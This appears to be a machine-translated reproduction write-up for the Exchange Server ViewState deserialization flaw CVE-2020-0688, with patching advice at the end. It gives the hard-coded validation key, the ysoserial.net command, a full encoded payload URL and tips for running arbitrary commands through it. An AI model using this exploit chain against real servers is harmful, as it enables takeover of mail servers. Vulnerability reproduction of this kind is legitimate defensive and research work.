Shulou(Shulou.com)05/31 Report--

This article introduces how to achieve exchange remote code execution vulnerability CVE-2020-0688 reproduction, the content is very detailed, interested friends can refer to, hope to be helpful to you.

The network exposes a Microsoft Exchange Server remote code execution vulnerability numbered CVE-2020-0688. The Ding Niu security team simulates the vulnerability and analyzes the causes and exploitation of the vulnerability, hoping to help enterprises understand the harm of the vulnerability and repair the vulnerability in time to stay away from hackers.

Affect the version

Microsoft Exchange Server 2010 Service Pack 3

Microsoft Exchange Server 2013

Microsoft Exchange Server 2016

Microsoft Exchange Server 2019

Loophole principle

The flaw is due to the fact that the Exchange server does not correctly create a unique encryption key during installation.

Specifically, unlike normal software installations that generate random keys every time, all Exchange Server have the same validationKey and decryptionKey in the installed web.config file. These keys are used to ensure the security of ViewState. ViewState is the server-side data stored on the client by ASP.NET Web applications in a serialized format. The client returns this data to the server through the _ _ VIEWSTATE request parameter. An attacker can execute arbitrary .net code on an ExchangeControl Panel web application.

When an attacker obtains a user account password that can access the Exchange Control Panel (ECP) component by various means. An attacker can execute arbitrary code on the attacked exchange and gain server privileges directly.

Recurrence process 1. Variables are needed

To exploit this vulnerability, we need four parameters, which are:

-- validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF (default, cause of vulnerability)

-- validationalg = SHA1 (default, cause of vulnerability)

-- generator=B97B4E27 (basic default)

-- viewstateuserkey = ASP.NET_SessionId (manual acquisition, variable, inconsistent with each login)

Of the four variables, the first two are fixed by default, and the values of viewstateuserkey and generator need to be collected from the authenticated session. Viewstateuserkey can be obtained from ASP.NET 's _ SessionID cookie, while generator can be found in a hidden field, _ _ VIEWSTATEGENERATOR. All of this is easily accessible through the tools in the browser.

2. Get viewstateuserkey and Generator values

Visit the / ecp/default.aspx page after normal login. Using the Network option of the F12 developer tool, refresh the page and resend the request to find the original response of / ecp/default.aspx at login.

Find ASP.NET_SessionId 's cookie in the Headers tab:

Search the Response tab for _ _ VIEWSTATEGENERATOR to get the field value:

If you don't find this field, don't panic, just use the default value, B97B4E27.

3. Use tools to generate payload

Use the ysoserial.net tool to generate deserialized payload. Tool download address: https://github.com/pwntester/ysoserial.net/

Generate the payload command:

Ysoserial.exe-p ViewState-g TextFormattingRunProperties-c "calc.exe"-- validationalg= "SHA1"-- validationkey= "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"-- generator= "B97B4E27"-- viewstateuserkey= "d673d1a4-1794-403e-ab96-e283ca880ef2"-- isdebug-- islegacy4, construct attack address

After generating the payload code, you need to encode the code with URL Encode to construct a URL

/ ecp/default.aspx?__VIEWSTATEGENERATOR=&__VIEWSTATE=

Replace the _ _ VIEWSTATEGENERATOR value obtained initially, and replace the URL Encode-encoded payload.

Example:

Https://192.168.1.248/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyhAYAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuM**wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuR**ybWF0dGluZy5UZXh0R**ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVnc**1bmRCcnVzaAECAAAABgMAAACmBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljc**zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI%2BDQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZSA9ICJ7IHg6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lID0gIlN0YXJ0IiA%2BDQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BY2FsYy5leGU8L1N5c3RlbTpTdHJpbmc%2BDQogICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM%2BDQogICAgPC9PYmplY3REYXRhUHJvdmlkZXI%2BDQo8L1Jlc291cmNlRGljdGlvbmFyeT4Lp73ado0NJN2PSSnfOoN9h5H7xCU%3D

5. Access the address and execute it successfully

Access to the constructed URL address, the server will pop up 500 errors, but the attack is actually successful.

Log in to the server to view the process and find that the calculator started successfully.

Other questions 1. About the version

There are some claims on the Internet that the vulnerability is limited to small versions of large versions. In fact, this is not the case, it should be a full version of the kill. I test the environment server 12 + exchange 2013. Tested 15.0.516.32 (December 3, 2012) and 15.0.1497.2 (June 18, 2019), that is, update23, there are loopholes, can be reproduced successfully, 16 Person19 did not test, should be similar.

2 、 _ _ VIEWSTATEGENERATOR

This parameter has not been available in the initial version (it is really unimportant, basically the default). The main reason for this problem is that the system patch KB2919355 is not updated, and the _ _ VIEWSTATEGENERATOR field appears after the patch is updated.

3. Unable to create file

Most repeaters only reproduce to start the calculator, but cannot create a file. However, after testing, it is found that the problem lies in the-c parameter of ysoserial.exe. Although during the demonstration, the file can be created directly by-c "echo OOOPS parameters! > c:/Vuln_Server.txt", which makes people mistakenly think that-c is running under the cmd window, but in fact-c is actually the content of "running", so direct echo is not allowed, it needs-c "cmd / c echo test > C:\ 1.txt", and the file is successfully created after testing. As shown in the figure:

4. URL Encode coding

When encoding the generated payload, you need to be careful to encode only the key special characters. If fully encoded, you will not be able to use it successfully.

Repair recommendation 1, recommend timely update related patch product article download Microsoft Exchange Server 2010 Service Pack 3 update summary 304536989 security update Microsoft Exchange Server 2013 cumulative update 234536988 security update Microsoft Exchange Server 2016 cumulative update Microsoft Exchange Server 2016 cumulative update Microsoft Exchange Server 2019 cumulative update 44536987 security update 2, restrict access to the Exchange Control Panel (ECP) component page

Since this vulnerability requires the use of the Exchange Control Panel (ECP) component, it is also an effective emergency method to disable access to this component. It is recommended to update the patch as soon as conditions permit.

On how to achieve exchange remote code execution vulnerability CVE-2020-0688 repeat to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.